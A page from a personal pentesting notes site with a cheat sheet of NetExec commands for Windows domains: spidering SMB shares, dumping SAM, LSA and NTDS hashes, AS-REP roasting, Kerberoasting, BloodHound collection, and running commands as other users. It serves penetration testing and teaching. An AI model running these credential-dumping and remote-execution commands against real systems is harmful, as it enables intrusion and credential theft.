Pentesting Notes
  • Home
  • 🌐Web pentesting
    • Content Discovery
    • Subdomain Enumeration
    • Authentication bypass
    • IDOR (Insecure Direct Object Reference)
    • Git repository
    • XSS
    • SSRF
    • CSRF
    • Injection
      • SQL Injection
      • Cypher injection
      • Command injection
      • Server Side Template Injection
      • NoSQL injection
      • XXE
    • FI (File Inclusion)
    • File upload
    • OAuth
    • JWT
    • CORS
    • Prototype pollution
    • Request Smuggling
  • Windows Pentesting
    • Enumerating users (No credentials)
    • Privilege Escalation
    • Post-Exploitation
    • Cross-domain enumeration
    • LDAP port (389, 636, 3268, 3269)
    • SMB port (139,445)
    • MSSQL port (1433)
    • Certificate Authority (CA)
    • Delegation attacks
    • Attacking Kerberos
    • Relay attacks
    • Bypassing Security
    • File Transfer
    • GPO (Group Policy Object)
    • Tools
      • Mimikatz
      • NetExec
      • Crackmapexec (CME)
      • Powerview
      • Bloodhound
      • Impacket
      • BloodyAD
      • Sliver C2
  • 🐧Linux Pentesting
    • Linux Privilege Esclation
    • Escape docker
    • Ansible
  • 🕊️Cross platform pivoting
    • Pivoting
  • ☁️Cloud
    • Kubernetes
    • Azure
      • Architecture
        • RBAC & ABAC roles
        • Entra ID roles
        • Entra ID - Authentication with OAuth and API's
        • Consent and Permissions
      • Service Discovery, Recon, Enumeration and Initial Access Attacks
        • Unauthenticated Recon
        • Password Spraying
        • Azure App Service
        • Azure Blob Storage
        • Phishing with Evilginx
        • Conditional Access
      • Authenticated Enumeration
        • ROADTools
        • BloodHound & AzureHound
        • Storage Accounts (database)
      • Privilege Escalation
        • Illicit Consent Grant
        • Macro enabled Word-files (Revshell)
        • Add secrets to app
        • Automation Accounts & Function Apps
        • Virtual Machines
        • Key Vault
        • ARM Deployment History
        • Enterprise Application / Service Principal
      • Lateral Movement
        • Entra ID Devices & Primary Refresh Tokens
        • Dynamic Groups
        • Application Proxy
        • Hybrid Identity
  • 🔁Reversing
    • Windows executables and DLL's
    • Linux binaries
    • Java applications
    • Android APK
  • 🛜Wireless networks
    • WPA/WPA2
    • WPS
    • WEP
    • Capative portal bypass
    • Setting up a Rogue Access Point
    • WPA Enterpise (WPA-MGT)
  • ⭐Tips and tricks
    • Tips and tricks
Powered by GitBook
On this page
  • SMB spidering shares
  • Dumping hashes
  • Bloodhound
  • AS-REP Roasting
  • Kerberoasting
  • SMB logged on users
  • SMB active sessions
  • SMB Execute commands on behalf of other users
  1. Windows Pentesting
  2. Tools

NetExec

PreviousMimikatzNextCrackmapexec (CME)

Last updated 1 year ago

NetExec (a.k.a nxc) is a network service exploitation tool that helps automate assessing the security of large networks. It is based on CrackMapExec, which makes the tool familiar to use.

Personally, I think the modules from NetExec make it worth to use the tool.


SMB spidering shares

Spider and export all files from shares:

nxc smb 10.10.10.10 -u 'user' -p 'pass' -M spider_plus -o DOWNLOAD_FLAG=True

List all readable files:

nxc smb 10.10.10.10 -u 'user' -p 'pass' -M spider_plus

Dumping hashes

Dumping SAM

nxc smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --sam

Dumping LSA

nxc smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --lsa

Dumping from NTDS.dit

nxc smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds
nxc smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds --users
nxc smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds --users --enabled
nxc smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds vss

Bloodhound

If you have creds, you can use nxc to get a zip or .json files for bloodhound

nxc ldap <ip> -u user -p pass --bloodhound -ns <ns-ip> --collection All

AS-REP Roasting

Only one user

nxc ldap 192.168.0.104 -u harry -p '' --asreproast output.txt

List including usernames

nxc ldap 192.168.0.104 -u user.txt -p '' --asreproast output.txt

Kerberoasting

nxc ldap 192.168.0.104 -u harry -p pass --kerberoasting output.txt

SMB logged on users

nxc smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --loggedon-users

SMB active sessions

nxc smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --sessions

SMB Execute commands on behalf of other users

nxc smb <ip> -u <localAdmin> -p <password> -M schtask_as -o USER=<logged-on-user> CMD=<cmd-command>
WelcomeNetExec
Logo